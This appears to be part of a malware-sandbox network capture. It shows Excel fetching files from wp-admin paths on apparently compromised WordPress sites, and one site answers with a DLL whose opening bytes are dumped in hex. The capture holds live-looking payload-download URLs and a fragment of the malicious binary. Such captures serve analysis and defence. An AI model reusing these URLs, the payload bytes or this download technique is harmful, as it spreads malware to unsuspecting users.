                                                Connection: Keep-Alive
                                                May 23, 2022 08:35:05.960398912 CEST1169INHTTP/1.1 301 Moved Permanently
                                                Date: Mon, 23 May 2022 06:35:03 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, Keep-Alive
                                                Location: http://www.kabeonet.pl/wp-admin/VWlAz5vWJNHDb/
                                                Content-Length: 0
                                                Keep-Alive: timeout=2, max=100
                                                Content-Type: text/html; charset=UTF-8


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.2249178193.143.77.3480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                TimestampkBytes transferredDirectionData
                                                May 23, 2022 08:35:06.065642118 CEST1170OUTGET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1
                                                Accept: */*
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: www.kabeonet.pl
                                                Connection: Keep-Alive
                                                May 23, 2022 08:35:07.104851961 CEST1172INHTTP/1.1 404 Not Found
                                                Date: Mon, 23 May 2022 06:35:06 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://www.kabeonet.pl/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, Keep-Alive
                                                Keep-Alive: timeout=2, max=100
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 31 31 66 30 30 0d 0a 09 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 26 20 21 28 49 45 20 38 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 09 09 0d 0a 09 09 09 4e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 73 74 72 6f 6e 79 50 72 6f 6a 65 6b 74 6f 77 61 6e 69 65 20 73 74 72 6f 6e 20 69 6e 74 65 72 6e 65 74 6f 77 79 63 68 20 4f 70 6f 6c 65 09 09 0d 0a 09 09 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 09 09 0d 0a 20 20 20 20 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 38 2e 39 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 6c 5f 50 4c 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 74 72 6f 6e 79 20 6e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 2d 20 50 72 6f 6a 65 6b 74 6f 77 61 6e 69 65 20 73 74 72 6f 6e 20 69 6e 74 65 72 6e 65 74 6f 77 79 63 68 20 4f 70 6f 6c 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a
                                                Data Ascii: 11f00<!DOCTYPE html>...[if IE 7]><html class="ie ie7" lang="pl-PL"><![endif]-->...[if IE 8]><html class="ie ie8" lang="pl-PL"><![endif]-->...[if !(IE 7) & !(IE 8)]>...><html lang="pl-PL">...<![endif]--><head><meta charset="UTF-8" /><title>Nie znaleziono stronyProjektowanie stron internetowych Opole</title><link rel="profile" href="http://gmpg.org/xfn/11"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href='https://fonts.googleapis.com/css?family=Roboto:400,100,300&subset=latin,latin-ext' rel='stylesheet' type='text/css'> <meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v18.9 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="pl_PL" /><meta property="og:title" content="Strony nie znaleziono - Projektowanie stron internetowych Opole" /><meta property="og:
                                                May 23, 2022 08:35:07.104918003 CEST1173INData Raw: 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 72 6f 6a 65 6b 74 6f 77 61 6e 69 65 20 73 74 72 6f 6e 20 69 6e 74 65 72 6e 65 74 6f 77 79 63 68 20 4f 70 6f 6c 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70
                                                Data Ascii: site_name" content="Projektowanie stron internetowych Opole" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.kabeonet.pl/#organization","na
                                                May 23, 2022 08:35:07.104959011 CEST1174INData Raw: 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c
                                                Data Ascii: bootstrapcdn.com' /><link rel='dns-prefetch' href='//www.google.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel='dns-prefetch' href='//c0.wp.com' /><link rel='dns-prefetch' href='//i0.wp.com' /><script type="text/javascript">
                                                May 23, 2022 08:35:07.104996920 CEST1176INData Raw: 21 73 28 5b 35 35 33 35 36 2c 35 36 38 32 36 2c 35 35 33 35 36 2c 35 36 38 31 39 5d 2c 5b 35 35 33 35 36 2c 35 36 38 32 36 2c 38 32 30 33 2c 35 35 33 35 36 2c 35 36 38 31 39 5d 29 26 26 21 73 28 5b 35 35 33 35 36 2c 35 37 33 33 32 2c 35 36 31 32
                                                Data Ascii: !s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,
                                                May 23, 2022 08:35:07.105036974 CEST1177INData Raw: 6e 74 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73
                                                Data Ascii: nt;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/5.9.3/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><style id=
                                                May 23, 2022 08:35:07.105081081 CEST1179INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a
                                                Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,
                                                May 23, 2022 08:35:07.105120897 CEST1180INData Raw: 64 69 65 6e 74 2d 2d 70 61 6c 65 2d 6f 63 65 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 34 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25
                                                Data Ascii: dient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight
                                                May 23, 2022 08:35:07.105159998 CEST1181INData Raw: 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d
                                                Data Ascii: eset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-ligh
                                                May 23, 2022 08:35:07.105200052 CEST1183INData Raw: 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61
                                                Data Ascii: r: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--pr
                                                May 23, 2022 08:35:07.105238914 CEST1184INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72
                                                Data Ascii: p--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !im
                                                May 23, 2022 08:35:07.146222115 CEST1186INData Raw: 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c
                                                Data Ascii: -blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-grad


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.2249174188.114.97.10443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                TimestampkBytes transferredDirectionData
                                                2022-05-23 06:34:52 UTC0OUTGET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1
                                                Accept: */*
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: vipteck.com
                                                Connection: Keep-Alive
                                                2022-05-23 06:34:52 UTC0INHTTP/1.1 200 OK
                                                Date: Mon, 23 May 2022 06:34:52 GMT
                                                Content-Type: application/x-msdownload
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/7.4.29
                                                Cache-Control: no-cache, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 23 May 2022 06:34:52 GMT
                                                Content-Disposition: attachment; filename="RD05UTHGkitvIJt.dll"
                                                Content-Transfer-Encoding: binary
                                                Set-Cookie: 628b2b0ca6399=1653287692; expires=Mon, 23-May-2022 06:35:52 GMT; Max-Age=60; path=/
                                                Vary: X-Forwarded-Proto,Accept-Encoding
                                                Last-Modified: Mon, 23 May 2022 06:34:52 GMT
                                                CF-Cache-Status: DYNAMIC
                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=by6ZvOmyimayF6BkcsLzKiu3y21jUr1e57DCFmUt3omG24YRiSwFOob%2F2Jo5mCoQ%2FijuxUgJZFotRBbkK1bzIbcREfYRxbzFJ0liPS%2FjHPrtMNjGLyKQVUZridHxEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 70fbc4ad9a649be0-FRA
                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                2022-05-23 06:34:52 UTC1INData Raw: 63 37 31 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00
                                                Data Ascii: c71MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b
                                                2022-05-23 06:34:52 UTC1INData Raw: 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00
                                                Data Ascii: 5T@P .text
                                                2022-05-23 06:34:52 UTC3INData Raw: c7 4c 2b c0 90 0f b6 10 42 0f b6 0c 00 2b d1 75 07 48 ff c0 85 c9 75 ed 85 d2 74 0f 49 83 c1 04 49 83 c2 02 45 85 db 75 cc eb 0b 41 0f b7 02 8b 5c 85 00 48 03 df 48 8b 6c 24 10 48 8b 74 24 20 48 8b c3 48 8b 5c 24 18 5f c3 cc cc cc cc cc cc cc cc cc cc cc 40 55 56 48 8d ac 24 28 f5 ff ff 48 81 ec d8 0b 00 00 48 8b 05 4f 9d 02 00 48 33 c4 48 89 85 c0 0a 00 00 ff ca 48 8b f1 0f 85 0d 1e 00 00 c7 44 24 20 06 b8 27 4e c7 44 24 24 56 1d 6f 1b c7 44 24 28 66 37 32 01 c7 44 24 2c 71 1e 2f 28 c7 44 24 30 0f 18 a6 c3 c7 44 24 34 0e 50 b7 d5 c7 44 24 38 99 12 d0 80 c7 44 24 3c fd 77 43 35 c7 44 24 40 42 aa a1 1d c7 44 24 44 4d 19 67 1d c7 44 24 48 6a 2f c8 8b c7 44 24 4c 7c ff 1a 27 c7 44 24 50 04 fc b5 20 c7 44 24 54 2e 23 ee 28 c7 44 24 58 09 32 ad 18 c7 44 24 5c
                                                Data Ascii: L+B+uHutIIEuA\HHl$Ht$ HH\$_@UVH$(HHOH3HHD$ 'ND$$VoD$(f72D$,q/(D$0D$4PD$8D$<wC5D$@BD$DMgD$Hj/D$L|'D$P D$T.#(D$X2D$\
                                                2022-05-23 06:34:52 UTC4INData Raw: 60 3d c7 85 70 01 00 00 4d 31 33 55 c7 85 74 01 00 00 80 6c d6 3d c7 85 78 01 00 00 4d 70 1c a6 c7 85 7c 01 00 00 22 0a af 0c c7 85 80 01 00 00 0e 46 5f 51 c7 85 84 01 00 00 69 35 3e ce c7 85 88 01 00 00 61 55 4a 27 c7 85 8c 01 00 00 a7 91 3a ec c7 85 90 01 00 00 34 4e 53 0b c7 85 94 01 00 00 ef 71 a6 1a c7 85 98 01 00 00 56 f7 7d b5 c7 85 9c 01 00 00 21 40 43 2b c7 85 a0 01 00 00 e8 ac fa 24 c7 85 a4 01 00 00 55 39 ac 6f c7 85 a8 01 00 00 4c 20 5d 31 c7 85 ac 01 00 00 78 6a 16 c5 c7 85 b0 01 00 00 68 69 11 37 c7 85 b4 01 00 00 99 94 6c d4 c7 85 b8 01 00 00 35 0d 0a
                                                Data Ascii: `=pM13Utl=xMp|"F_Qi5>aUJ':4NSqV}!@C+$U9oL ]1xjhi7l5
                                                2022-05-23 06:34:52 UTC4INData Raw: 37 37 37 0d 0a 4d 68 18 c7 85 bc 01 00 00 a6 2b 0e 20 c7 85 c0 01 00 00 0d 19 a6 12 c7 85 c4 01 00 00 d8 28 11 5e c7 85 c8 01 00 00 0f b8 3c 42 c7 85 cc 01 00 00 a1 1c 61 52 c7 85 d0 01 00 00 6b 78 66 63 c7 85 d4 01 00 00 0b ef 60 52 c7 85 d8 01 00 00 7f 24 c8 e1 c7 85 dc 01 00 00 74 ee 28 4f c7 85 e0 01 00 00 57 2d ac 3f c7 85 e4 01 00 00 bc 10 0a 94 c7 85 e8 01 00 00 63 e1 44 6a c7 85 ec 01 00 00 19 2e 59 9e c7 85 f0 01 00 00 8f 79 d5 77 c7 85 f4 01 00 00 1f 08 24 68 c7 85 f8 01 00 00 d2 34 39 9f c7 85 fc 01 00 00 15 b7 3d 4f c7 85 00 02 00 00 1b 27 62 eb c7 85 04 02 00 00 0e 75 4c f2 c7 85 08 02 00 00 33 e3 40 03 c7 85 0c 02 00 00 09 03 3e 82 c7 85 10 02 00 00 37 c3 2f 6a c7 85 14 02 00 00 a4 07 46 6c c7 85 18 02 00 00 3a 30 04 53 c7 85 1c 02 00 00 f2
                                                Data Ascii: 777Mh+ (^<BaRkxfc`R$t(OW-?cDj.Yyw$h49=O'buL3@>7/jFl:0S
                                                2022-05-23 06:34:52 UTC5INData Raw: 85 dc 03 00 00 0e e7 fd 79 c7 85 e0 03 00 00 db a9 32 35 c7 85 e4 03 00 00 3c 2d 07 15 c7 85 e8 03 00 00 5b 2d 22 84 c7 85 ec 03 00 00 a5 6a 69 2e c7 85 f0 03 00 00 2b 68 0f cb c7 85 f4 03 00 00 88 6e 6a 5e c7 85 f8 03 00 00 f0 58 cb 31 c7 85 fc 03 00 00 76 00 79 63 c7 85 00 04 00 00 5b 76 ec f2 c7 85 04 04 00 00 55 2b 6f 6e c7 85 08 04 00 00 e3 0f 12 27 c7 85 0c 04 00 00 e1 50 6c 35 c7 85 10 04 00 00 76 06 b1 b2 c7 85 14 04 00 00 65 e3 cf 40 c7 85 18 04 00 00 72 67 77 dd c7 85 1c 04 00 00 24 45 23 bf c7 85 20 04 00 00 a9 50 d2 78 c7 85 24 04 00 00 21 b9 a5 10 c7 85 28 04 00 00 43 2f e6 e0 c7 85 2c 04 00 00 5e 60 de e9 c7 85 30 04 00 00 23 28 a7 8b c7 85 34 04 00 00 1f 35 ee b8 c7 85 38 04 00 00 2b 4f b7 5c c7 85 3c 04 00 00 70 75 b6 ab c7 85 40 04 00 00
                                                Data Ascii: y25<-[-"ji.+hnj^X1vyc[vU+on'Pl5ve@rgw$E# Px$!(C/,^`0#(458+O\<pu@
                                                2022-05-23 06:34:52 UTC6INData Raw: 37 37 66 0d 0a c5 e7 c7 85 b8 04 00 00 58 a3 a1 1d c7 85 bc 04 00 00 3c 05 ba ae c7 85 c0 04 00 00 ed 06 18 1e c7 85 c4 04 00 00 c7 68 58 50 c7 85 c8 04 00 00 2b e6 69 54 c7 85 cc 04 00 00 c3 7c 5a 61 c7 85 d0 04 00 00 06 38 46 7b c7 85 d4 04 00 00 c8 ff 30 69 c7 85 d8 04 00 00 b0 d2 41 43 c7 85 dc 04 00 00 ef 7c 73 88 c7 85 e0 04 00 00 ad 2a 57 0d c7 85 e4 04 00 00 63 20 bc e2 c7 85 e8 04 00 00 74 66 9f 23 c7 85 ec 04 00 00 ee d8 a9 7a c7 85 f0 04 00 00 24 55 36 dc c7 85 f4 04 00 00 6c 7c 66 0a c7 85 f8 04 00 00 0a 14 6c 2d c7 85 fc 04 00 00 76 70 c0 76 c7 85 00 05 00 00 5e 2a 43 e4 c7 85 04 05 00 00 1a f2 a6 1d c7 85 08 05 00 00 69 13 19 35 c7 85 0c 05 00 00 29 c3 7a 62 c7 85 10 05 00 00 1b da 24 c9 c7 85 14 05 00 00 37 c8 f4 34 c7 85 18 05 00 00 69 a8
                                                Data Ascii: 77fX<hXP+iT|Za8F{0iAC|s*Wc tf#z$U6l|fl-vpv^*Ci5)zb$74i
                                                2022-05-23 06:34:52 UTC7INData Raw: d8 06 00 00 15 48 05 33 c7 85 dc 06 00 00 70 f5 35 e1 c7 85 e0 06 00 00 50 14 ce a2 c7 85 e4 06 00 00 23 f3 14 73 c7 85 e8 06 00 00 0f 61 c7 3a c7 85 ec 06 00 00 5c 9e 7e be c7 85 f0 06 00 00 32 2d e1 a2 c7 85 f4 06 00 00 13 3a 69 ff c7 85 f8 06 00 00 ed 2c 31 2e c7 85 fc 06 00 00 24 df 06 7d c7 85 00 07 00 00 e3 80 45 16 c7 85 04 07 00 00 c5 6f 4f 78 c7 85 08 07 00 00 fd a6 08 27 c7 85 0c 07 00 00 8e 3d 51 5a c7 85 10 07 00 00 24 22 27 d5 c7 85 14 07 00 00 a8 0c 12 62 c7 85 18 07 00 00 58 24 9b 7d c7 85 1c 07 00 00 ff 17 11 59 c7 85 20 07 00 00 2f 55 98 0d c7 85 24 07 00 00 ff 33 5c 4a c7 85 28 07 00 00 05 ca 26 10 c7 85 2c 07 00 00 56 39 ec 73 c7 85 30 07 00 00 11 1e 28 ef c7 85 34 07 00 00 a4 2e ee eb c7 85 38 07 00 00 3b db 81 70 c7 85 3c 07 00 00 e8
                                                Data Ascii: H3p5P#sa:\~2-:i,1.$}EoOx'=QZ$"'bX$}Y /U$3\J(&,V9s0(4.8;p<
                                                2022-05-23 06:34:53 UTC8INData Raw: 37 37 34 0d 0a 25 e0 11 c7 85 b8 07 00 00 6d 69 f1 ec c7 85 bc 07 00 00 10 b2 15 27 c7 85 c0 07 00 00 20 03 bd 7d c7 85 c4 07 00 00 68 91 12 71 c7 85 c8 07 00 00 3a 39 6d 3f c7 85 cc 07 00 00 ed 57 6c da c7 85 d0 07 00 00 ab 10 50 14 c7 85 d4 07 00 00 24 d8 e8 5b c7 85 d8 07 00 00 9a c1 49 12 c7 85 dc 07 00 00 d2 ae 37 3f c7 85 e0 07 00 00 c8 f5 39 69 c7 85 e4 07 00 00 b5 1c 7d 70 c7 85 e8 07 00 00 13 71 22 9c c7 85 ec 07 00 00 83 26 0c 72 c7 85 f0 07 00 00 5d 10 c0 7d c7 85 f4 07 00 00 b5 31 40 43 c7 85 f8 07 00 00 22 56 e1 32 c7 85 fc 07 00 00 a9 01 1d 4b c7 85 00 08 00 00 4d e1 44 6a c7 85 04 08 00 00 11 0d e3 1a c7 85 08 08 00 00 6c 1e 01 ba c7 85 0c 08 00 00 b8 27 bf f0 c7 85 10 08 00 00 17 fa af 50 c7 85 14 08 00 00 19 a8 a8 22 c7 85 18 08 00 00 2d
                                                Data Ascii: 774%mi' }hq:9m?WlP$[I7?9i}pq"&r]}1@C"V2KMDjl'P"-
                                                2022-05-23 06:34:53 UTC9INData Raw: 85 d8 09 00 00 31 e2 5c 75 c7 85 dc 09 00 00 4b 6f 2a 68 c7 85 e0 09 00 00 c3 db 2e d1 c7 85 e4 09 00 00 01 74 79 fd c7 85 e8 09 00 00 09 25 3c e1 c7 85 ec 09 00 00 27 68 08 f7 c7 85 f0 09 00 00 a7 77 ee d7 c7 85 f4 09 00 00 43 62 34 37 c7 85 f8 09 00 00 50 75 76 6d c7 85 fc 09 00 00 75 06 24 57 c7 85 00 0a 00 00 54 b7 6c f1 c7 85 04 0a 00 00 2d a6 36 14 c7 85 08 0a 00 00 2f 4c 42 c5 c7 85 0c 0a 00 00 ad 6b e2 5e c7 85 10 0a 00 00 48 3c c8 ea c7 85 14 0a 00 00 02 b2 08 af c7 85 18 0a 00 00 5b 5d 21 99 c7 85 1c 0a 00 00 b8 3b 2b 25 c7 85 20 0a 00 00 df 98 6f e3 c7 85 24 0a 00 00 88 25 4d 7d c7 85 28 0a 00 00 fd 0f 11 79 c7 85 2c 0a 00 00 2f ed 82 4a c7 85 30 0a 00 00 cc 66 b9 a0 c7 85 34 0a 00 00 6e c3 5b 55 c7 85 38 0a 00 00 0a 5c e6 f5 c7 85 3c 0a 00 00
                                                Data Ascii: 1\uKo*h.ty%<'hwCb47Puvmu$WTl-6/LBk^H<[]!;+% o$%M}(y,/J0f4n[U8\<
